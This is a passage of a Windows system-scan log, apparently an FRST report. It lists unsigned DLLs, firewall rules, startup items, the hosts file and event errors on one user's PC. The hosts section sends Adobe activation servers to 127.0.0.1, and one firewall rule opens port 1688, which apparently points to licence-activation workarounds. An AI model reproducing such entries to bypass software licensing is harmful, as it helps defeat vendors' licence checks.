20:39 - 2018-08-14 08:44 - 000382608 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co.,Ltd) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\x64\ImageSh.dll 2018-06-22 08:41 - 2018-06-22 08:41 - 020468224 _____ (FFmpeg Project) [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\avcodec-56.dll 2018-06-22 08:41 - 2018-06-22 08:41 - 005897216 _____ (FFmpeg Project) [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\avformat-56.dll 2018-06-22 08:41 - 2018-06-22 08:41 - 000481280 _____ (FFmpeg Project) [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\avutil-54.dll 2018-06-22 08:41 - 2018-06-22 08:41 - 000279552 _____ (FFmpeg Project) [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\swresample-1.dll 2018-09-16 20:40 - 2008-11-25 16:18 - 000892928 _____ (Free Software Foundation) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\iconv.dll 2010-08-06 11:15 - 2010-08-06 11:15 - 000071680 _____ (Hewlett-Packard) [File not signed] c:\windows\system32\hpzinw12.dll 2010-08-06 11:15 - 2010-08-06 11:15 - 000089600 _____ (Hewlett-Packard) [File not signed] c:\windows\system32\hpzipm12.dll 2018-08-05 13:55 - 2019-02-21 17:00 - 000078336 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll 2018-06-22 08:41 - 2018-06-22 08:41 - 000640000 _____ (Microsoft Corporation) [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\dbghelp.dll 2018-01-25 14:51 - 2018-01-25 14:51 - 000000000 ____L (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\Client\AppVIsvSubsystems32.dll 2018-01-25 14:51 - 2018-01-25 14:51 - 000000000 ____L (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\Office16\AppVIsvSubsystems32.dll 2018-01-25 14:51 - 2018-01-25 14:51 - 000000000 ____L (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\Office16\c2r32.dll 2018-06-22 08:41 - 2018-06-22 08:41 - 002639872 _____ (Python Software Foundation) [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\PYTHON27.DLL 2012-01-19 18:19 - 2012-01-19 18:19 - 001099776 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\LIBEAY32.dll 2012-01-19 18:20 - 2012-01-19 18:20 - 000237568 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\SSLEAY32.dll 2017-09-14 07:37 - 2017-09-14 07:37 - 000026112 _____ (The Qt Company Ltd) [File not signed] C:\ProgramData\MEGAsync\imageformats\qgif.dll 2017-09-14 07:42 - 2017-09-14 07:42 - 000033280 _____ (The Qt Company Ltd) [File not signed] C:\ProgramData\MEGAsync\imageformats\qicns.dll 2017-09-14 07:37 - 2017-09-14 07:37 - 000027648 _____ (The Qt Company Ltd) [File not signed] C:\ProgramData\MEGAsync\imageformats\qico.dll 2017-09-14 07:37 - 2017-09-14 07:37 - 000245760 _____ (The Qt Company Ltd) [File not signed] C:\ProgramData\MEGAsync\imageformats\qjpeg.dll 2017-09-14 07:42 - 2017-09-14 07:42 - 000021504 _____ (The Qt Company Ltd) [File not signed] C:\ProgramData\MEGAsync\imageformats\qsvg.dll 2017-09-14 07:42 - 2017-09-14 07:42 - 000020992 _____ (The Qt Company Ltd) [File not signed] C:\ProgramData\MEGAsync\imageformats\qtga.dll 2017-09-14 07:42 - 2017-09-14 07:42 - 000316416 _____ (The Qt Company Ltd) [File not signed] C:\ProgramData\MEGAsync\imageformats\qtiff.dll 2017-09-14 07:42 - 2017-09-14 07:42 - 000019968 _____ (The Qt Company Ltd) [File not signed] C:\ProgramData\MEGAsync\imageformats\qwbmp.dll 2017-09-14 07:42 - 2017-09-14 07:42 - 000322560 _____ (The Qt Company Ltd) [File not signed] C:\ProgramData\MEGAsync\imageformats\qwebp.dll 2017-09-14 07:37 - 2017-09-14 07:37 - 001010688 _____ (The Qt Company Ltd) [File not signed] C:\ProgramData\MEGAsync\platforms\qwindows.dll 2019-05-16 20:09 - 2017-03-23 08:52 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\CBSProducstInfo.dll 2018-06-22 08:41 - 2018-06-22 08:41 - 000122368 _____ (wxWidgets development team) [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\wxbase28uh_net_vc.dll 2018-06-22 08:41 - 2018-06-22 08:41 - 001300992 _____ (wxWidgets development team) [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\wxbase28uh_vc.dll 2018-06-22 08:41 - 2018-06-22 08:41 - 000730112 _____ (wxWidgets development team) [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\wxmsw28uh_adv_vc.dll 2018-06-22 08:41 - 2018-06-22 08:41 - 003165184 _____ (wxWidgets development team) [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\wxmsw28uh_core_vc.dll 2018-06-22 08:41 - 2018-06-22 08:41 - 000479744 _____ (wxWidgets development team) [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\wxmsw28uh_html_vc.dll ==================== Alternate Data Streams (Whitelisted) ======== (If an entry is included in the fixlist, only the ADS will be removed.) AlternateDataStreams: C:\Users\Luis M\.DS_Store:AFP_AfpInfo [122] AlternateDataStreams: C:\Users\Luis M\Downloads\Listas de canales xml para XBMC.rar:com.dropbox.attributes [168] ==================== Safe Mode (Whitelisted) ================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" ==================== Association (Whitelisted) ================= ==================== Internet Explorer trusted/restricted ========== (If an entry is included in the fixlist, it will be removed from the registry.) IE trusted site: HKU\S-1-5-21-1536180041-2647868905-2353555993-1000\...\fnmt.es -> hxxps://fnmt.es IE trusted site: HKU\S-1-5-21-1536180041-2647868905-2353555993-1000\...\fnmt.es -> hxxp://fnmt.es IE trusted site: HKU\S-1-5-21-1536180041-2647868905-2353555993-1000\...\gob.es -> hxxps://fnmt.gob.es IE trusted site: HKU\S-1-5-21-1536180041-2647868905-2353555993-1000\...\gob.es -> hxxp://fnmt.gob.es ==================== Hosts content: ========================= (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2018-01-22 20:25 - 2018-02-02 19:44 - 000003398 _____ C:\WINDOWS\system32\drivers\etc\hosts 127.0.0.1 209.34.83.73:443 127.0.0.1 209.34.83.73:43 127.0.0.1 209.34.83.73 127.0.0.1 209.34.83.67:443 127.0.0.1 209.34.83.67:43 127.0.0.1 209.34.83.67 127.0.0.1 ood.opsource.net 127.0.0.1 199.7.52.190:80 127.0.0.1 199.7.52.190 127.0.0.1 OCSP.SPO1.VERISIGN.COM 127.0.0.1 199.7.54.72:80 127.0.0.1 199.7.54.72 127.0.0.1 192.150.14.69 127.0.0.1 192.150.18.101 127.0.0.1 192.150.18.108 127.0.0.1 192.150.22.40 127.0.0.1 192.150.8.100 127.0.0.1 192.150.8.118 127.0.0.1 209-34-83-73.ood.opsource.net 127.0.0.1 3dns-1.adobe.com 127.0.0.1 3dns-2.adobe.com 127.0.0.1 3dns-2.adobe.com 127.0.0.1 3dns-3.adobe.com 127.0.0.1 3dns-3.adobe.com 127.0.0.1 3dns-4.adobe.com 127.0.0.1 3dns.adobe.com 127.0.0.1 activate-sea.adobe.com 127.0.0.1 activate-sea.adobe.com 127.0.0.1 activate-sjc0.adobe.com 127.0.0.1 activate-sjc0.adobe.com ==================== Other Areas =========================== (Currently there is no automatic fix for this section.) HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\;C:\Program Files\PuTTY\;C:\Program Files\AutoFirma\AutoFirma HKU\S-1-5-21-1536180041-2647868905-2353555993-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Luis M\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper DNS Servers: 1.1.1.1 - 1.0.0.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Warn) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == (If an entry is included in the fixlist, it will be removed.) HKLM\...\StartupApproved\Run: => "iTunesHelper" HKLM\...\StartupApproved\Run: => "AdobeGCInvoker-1.0" HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0" HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched" HKLM\...\StartupApproved\Run32: => "AdobeAAMUpdater-1.0" HKLM\...\StartupApproved\Run32: => "AdobeGCInvoker-1.0" HKU\S-1-5-21-1536180041-2647868905-2353555993-1000\...\StartupApproved\Run: => "Plex Media Server" HKU\S-1-5-21-1536180041-2647868905-2353555993-1000\...\StartupApproved\Run: => "RoboForm" HKU\S-1-5-21-1536180041-2647868905-2353555993-1000\...\StartupApproved\Run: => "Opera Browser Assistant" ==================== FirewallRules (Whitelisted) ================ (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [OpenSSH-Server-In-TCP] => (Allow) %SystemRoot%\system32\OpenSSH\sshd.exe No File FirewallRules: [UDP Query User{ED56B94A-CC7E-4C1B-B483-1F87802E142C}C:\program files\autofirma\autofirma\jre\bin\javaw.exe] => (Allow) C:\program files\autofirma\autofirma\jre\bin\javaw.exe FirewallRules: [TCP Query User{0CB3194C-899E-4535-8BF1-78C245BD2DC5}C:\program files\autofirma\autofirma\jre\bin\javaw.exe] => (Allow) C:\program files\autofirma\autofirma\jre\bin\javaw.exe FirewallRules: [{CDEB611D-E616-48CD-BF19-2B9446885671}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{1E5DBD01-F1C1-4D3A-BC46-16DB568AA909}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{6B3A4EA0-153A-4AC8-B440-A9279B436E33}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{977E3254-59F2-4483-983C-98D7F3A0584B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{0E408BBD-DAE8-4CA7-B75D-CFD44A87AFA3}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{08096EF1-04E6-44FF-A6C3-2606686DE8A1}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{0B7FFC62-298E-4498-B99F-A9966F2F8C28}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{6257A871-97A1-4015-AD41-DC24680A4FCA}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{57A9A25C-A2A8-4BAA-B41A-BB71DB035100}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{21553A85-F862-4E99-B19B-B26DC60A9521}] => (Allow) LPort=1688 FirewallRules: [{CB3EAF37-A60F-4549-8EAF-CB4847CB2506}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe (VideoLAN -> VideoLAN) FirewallRules: [{8A2032F2-A3BD-4ACA-8BB7-915A80871DF8}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe (VideoLAN -> VideoLAN) FirewallRules: [UDP Query User{0CB5DF51-89DD-435B-8238-B63E67583A61}C:\program files (x86)\sopcast\sopcast.exe] => (Allow) C:\program files (x86)\sopcast\sopcast.exe (www.sopcast.com) [File not signed] FirewallRules: [TCP Query User{4ED0938F-09B2-4049-AAC7-BC087725C723}C:\program files (x86)\sopcast\sopcast.exe] => (Allow) C:\program files (x86)\sopcast\sopcast.exe (www.sopcast.com) [File not signed] FirewallRules: [{ABC8F614-5243-47AC-8D18-F6E73BA0BC72}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) FirewallRules: [{A0641CB0-B699-4770-9CF8-D9A3C9415C1D}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation) FirewallRules: [{89C7D7EB-B9D9-410C-B1F6-E30825C90627}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation) FirewallRules: [{926D38C5-64E4-4E38-A7F7-C2531E253D00}] => (Allow) C:\Users\Luis M\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{AB6054E3-DF72-44CC-8394-7D49C7676B08}] => (Allow) C:\Users\Luis M\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [UDP Query User{D745C1B1-5458-493B-85AE-6FA312EB5835}C:\program files (x86)\emule\emule.exe] => (Allow) C:\program files (x86)\emule\emule.exe (hxxp://www.emule-project.net) [File not signed] FirewallRules: [TCP Query User{DD391D0B-BC55-4F39-80E9-78C3BE4EC33C}C:\program files (x86)\emule\emule.exe] => (Allow) C:\program files (x86)\emule\emule.exe (hxxp://www.emule-project.net) [File not signed] FirewallRules: [{B4EA12AB-9B3D-465F-AF05-DE7F5F13EF9E}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd) FirewallRules: [{D842014D-2543-40A4-B969-0DC6A7919E52}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd) FirewallRules: [{C1AA7A53-0A43-438B-B3F2-5D1A9662664F}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TbService.exe (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co., Ltd) [File not signed] FirewallRules: [{29D02507-9A91-4926-87E4-2CDA3E76F079}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TbService.exe (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co., Ltd) [File not signed] FirewallRules: [{05307E8C-CAB7-4A64-8A29-40ED82609243}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TBConsoleUI.exe (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co., Ltd) [File not signed] FirewallRules: [{ADB291CA-4871-4317-A5E4-1B725ED6EAAD}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TBConsoleUI.exe (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co., Ltd) [File not signed] FirewallRules: [{A21E2027-B1A0-4EEC-AB80-AD9FD3496503}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TodoBackupService.exe (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] FirewallRules: [{6BEEC26D-0B43-47FB-A355-8B4A95C70C04}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TodoBackupService.exe (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] FirewallRules: [{622A0E79-00CE-487D-8DB2-F8930A104C4F}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TodoBackupService.exe (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] FirewallRules: [{86B52F15-8C7A-4429-8B97-EA05BA0024B3}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TodoBackupService.exe (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] FirewallRules: [{FD84BD02-BDE9-48D9-8728-CB94BD53C9D8}] => (Allow) C:\Users\Luis M\Downloads\DropboxInstaller.exe (Dropbox, Inc -> Dropbox, Inc.) FirewallRules: [{051B8E49-6FAC-4701-A490-40DEAB145E96}] => (Allow) C:\Users\Luis M\Downloads\DropboxInstaller.exe (Dropbox, Inc -> Dropbox, Inc.) FirewallRules: [{B3BC813E-0094-4052-9D16-A8E65F8BABEC}] => (Allow) C:\Users\Luis M\Downloads\DropboxInstaller.exe (Dropbox, Inc -> Dropbox, Inc.) FirewallRules: [{226C2EAE-CEEE-402F-A3C9-3CAB299CAC35}] => (Allow) C:\Users\Luis M\Downloads\DropboxInstaller.exe (Dropbox, Inc -> Dropbox, Inc.) FirewallRules: [{D71BA5FE-99CC-4ADB-9262-E23252407074}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd) FirewallRules: [{C956B44B-AE97-4733-B1C6-80F2B57219A2}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd) FirewallRules: [{451CDB74-144F-4A96-AD22-4B2032D1B1BC}] => (Allow) C:\Program Files\HP\HP DeskJet 3700 series\Bin\DeviceSetup.exe (Hewlett Packard -> HP Inc.) FirewallRules: [{65463B72-8ED8-41D5-A8F8-E4728908105E}] => (Allow) LPort=5357 FirewallRules: [{FB73988C-1EBB-4DA6-B81C-AC1A0ECE3D9B}] => (Allow) C:\Program Files\HP\HP DeskJet 3700 series\Bin\HPNetworkCommunicatorCom.exe (Hewlett Packard -> HP Inc.) FirewallRules: [{4A13F5F7-2746-4F61-9826-B077255A18AC}] => (Allow) C:\Program Files (x86)\SHAREit Technologies\SHAREit\SHAREit.exe (SHAREit Technologies Co.Ltd -> SHAREit Technologies Co.Ltd) FirewallRules: [{67CE8D6A-6C19-4F1E-BDAD-2F6C48D6999B}] => (Allow) C:\Program Files (x86)\SHAREit Technologies\SHAREit\SHAREit.exe (SHAREit Technologies Co.Ltd -> SHAREit Technologies Co.Ltd) FirewallRules: [{13F09D35-3FDC-4ECC-82C6-33A53CFE557A}] => (Allow) C:\Program Files (x86)\Plex\Plex Media Server\Plex Media Server.exe (Plex, Inc -> Plex, Inc.) FirewallRules: [{240AA796-856D-41BB-9526-E0978A295E0A}] => (Allow) C:\Program Files (x86)\Plex\Plex Media Server\PlexScriptHost.exe (Plex, Inc -> Python Software Foundation) FirewallRules: [{323004C4-D028-4396-B8CE-F733F3C59178}] => (Allow) C:\Program Files (x86)\Plex\Plex Media Server\Plex DLNA Server.exe (Plex, Inc -> Plex, Inc.) FirewallRules: [{CE314D74-796E-4E4D-9351-34A6A58DF937}] => (Allow) C:\Program Files (x86)\Plex\Plex Media Server\Plex Tuner Service.exe (Plex, Inc -> ) FirewallRules: [{EC92B6E2-722A-47F5-9A08-784E01ED1282}] => (Allow) C:\Users\Luis M\AppData\Local\Programs\Opera\63.0.3368.107\opera.exe (Opera Software AS -> Opera Software) FirewallRules: [{732A7B6D-5E4F-4BF7-8878-929178A028DF}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH) FirewallRules: [{66B2BB81-283B-4FC0-A658-38690B41C9AB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH) FirewallRules: [{DC457A19-0D9D-4436-A122-8E360A529678}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH) FirewallRules: [{EEDD5131-43EF-485F-AB09-8018C0D3FD59}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH) FirewallRules: [{967ACB3A-D2C0-4251-9EAF-43FB78848DDE}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12102.3.43028.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{39DF897E-16F4-48C2-A7B1-1065935E8AB1}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12102.3.43028.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{07BBF354-DF22-4FBE-80F7-D014C6B14D49}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12102.3.43028.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{571947F6-F02A-4DC8-8279-2EFE0C3BB57C}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12102.3.43028.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{1AEDBF37-26C4-4A72-BA3A-AB20B6A64EEC}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12102.3.43028.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{E085495A-A60B-4D29-B94E-1BA8D670970C}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12102.3.43028.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{9CCA2DFD-3902-4908-9154-D77A3A6E2108}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12102.3.43028.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{ABA7F62F-CA84-42F8-BBD3-DC7A151DFF22}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12102.3.43028.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{5CDCB0E8-A82E-428C-863D-80F7DB44EA40}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.118.611.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{4DE094DB-6ACE-409D-8493-0A657F79E9C4}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.118.611.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{DF59F304-C279-4E25-BD48-7106BA96CC54}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.118.611.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{419E17AB-301D-4E38-9790-F5B84A2EF851}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.118.611.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{A9DA9296-D8A5-451A-807C-E924807C8A51}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.118.611.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{A5930C49-34F2-4831-A66F-5E403D12BDCE}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.118.611.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{587E9845-C7E7-49A6-8D57-E4B048664937}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.118.611.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{6F69F7CD-127C-4B23-BCC2-F961A092DEA8}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.118.611.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [TCP Query User{F07BEAC7-F5FB-4921-B598-9D6C6B1294E8}C:\users\luis m\downloads\tv samsung ue40h6400\samsung\instalador\sammywidgets.exe] => (Allow) C:\users\luis m\downloads\tv samsung ue40h6400\samsung\instalador\sammywidgets.exe () [File not signed] FirewallRules: [UDP Query User{76AB6ABE-8521-4EBB-9742-DC3A3E9E54A1}C:\users\luis m\downloads\tv samsung ue40h6400\samsung\instalador\sammywidgets.exe] => (Allow) C:\users\luis m\downloads\tv samsung ue40h6400\samsung\instalador\sammywidgets.exe () [File not signed] FirewallRules: [{A7C274F7-8DD9-4D39-B74F-79C17BC383EC}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{DB1CBF92-D527-4EE8-89D6-532027DCB43E}] => (Allow) C:\WINDOWS\system32\rundll32.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{8EE8A0DF-7CBD-46BF-B17B-E5C8C4C30F2F}] => (Allow) C:\Users\Luis M\AppData\Local\Programs\Opera\64.0.3417.92\opera.exe (Opera Software AS -> Opera Software) FirewallRules: [{D821B8BF-1FAC-4736-9173-6753217FFDC4}] => (Allow) LPort=5354 FirewallRules: [{BF18732C-9F81-4EDF-87B2-3419FB7F5C5F}] => (Allow) LPort=5354 FirewallRules: [{080C4160-8E98-4B2B-9E5C-2A7E3A7203E3}] => (Allow) LPort=5354 FirewallRules: [{735A16E5-ADF2-4350-926C-15F36DD67710}] => (Allow) LPort=5354 FirewallRules: [{39406AD7-0A3E-4D2A-B230-A0E84BC3D842}] => (Allow) LPort=5354 FirewallRules: [{AB9293A8-9545-44F8-A52B-F0E9610B683E}] => (Allow) LPort=5354 FirewallRules: [{BA4A5F56-75EB-4DCB-9D04-B79F0C1AB568}] => (Allow) LPort=5354 FirewallRules: [{821A29FC-10EE-4DBB-B3F9-6387D7EB066D}] => (Allow) LPort=5354 FirewallRules: [{5C0CB903-54C9-4C4B-99AD-605951326760}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) FirewallRules: [{964E1B52-6C2F-41F1-ACC4-8A9F4EC3D844}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Dropbox, Inc -> Dropbox, Inc.) FirewallRules: [TCP Query User{465341F0-9244-46A7-8F0F-4BB1DCBD113E}C:\users\luis m\appdata\roaming\acestream\engine\ace_engine.exe] => (Allow) C:\users\luis m\appdata\roaming\acestream\engine\ace_engine.exe (INNOVATIVE DIGITAL TECHNOLOGIES LLC -> Innovative Digital Technologies) FirewallRules: [UDP Query User{56BC3052-B0D1-426C-9800-74FCDFB99A7B}C:\users\luis m\appdata\roaming\acestream\engine\ace_engine.exe] => (Allow) C:\users\luis m\appdata\roaming\acestream\engine\ace_engine.exe (INNOVATIVE DIGITAL TECHNOLOGIES LLC -> Innovative Digital Technologies) ==================== Restore Points ========================= 14-11-2019 17:59:37 Driver Booster : Microsoft Visual C++ 2013 Redistributable (x86) ==================== Faulty Device Manager Devices ============ Name: 802.11n USB Wireless LAN Card #2 Description: Tarjeta LAN inalámbrica 802.11n USB Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318} Manufacturer: Ralink Technology, Corp. Service: netr28ux Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. ==================== Event log errors: ======================== Application errors: ================== Error: (11/18/2019 07:33:28 PM) (Source: ESENT) (EventID: 455) (User: ) Description: svchost (1256,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) al abrir un archivo de registro C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log. Error: (11/18/2019 07:18:54 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nombre de la aplicación con errores: MicrosoftEdgeSH.exe, versión: 11.0.18362.1, marca de tiempo: 0x3538007c Nombre del módulo con errores: unknown, versión: 0.0.0.0, marca de tiempo: 0x00000000 Código de excepción: 0xc0000409 Desplazamiento de errores: 0x0000000000000204 Identificador del proceso con errores: 0x27dc Hora de inicio de la aplicación con errores: 0x01d59e3c9ed92cd4 Ruta de acceso de la aplicación con errores: C:\WINDOWS\system32\MicrosoftEdgeSH.exe Ruta de acceso del módulo con errores: unknown Identificador del informe: 3b0a5b0b-6bff-466a-895c-d4c2a5139aaa Nombre completo del paquete con errores: Microsoft.MicrosoftEdge_44.18362.449.0_neutral__8wekyb3d8bbwe Identificador de aplicación relativa del paquete con errores: MicrosoftEdge Error: (11/17/2019 10:57:55 PM) (Source: ESENT) (EventID: 455) (User: ) Description: svchost (2196,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) al abrir un archivo de registro C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log. Error: (11/17/2019 10:25:17 PM) (Source: ESENT) (EventID: 455) (User: ) Description: svchost (3264,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) al abrir un archivo de registro 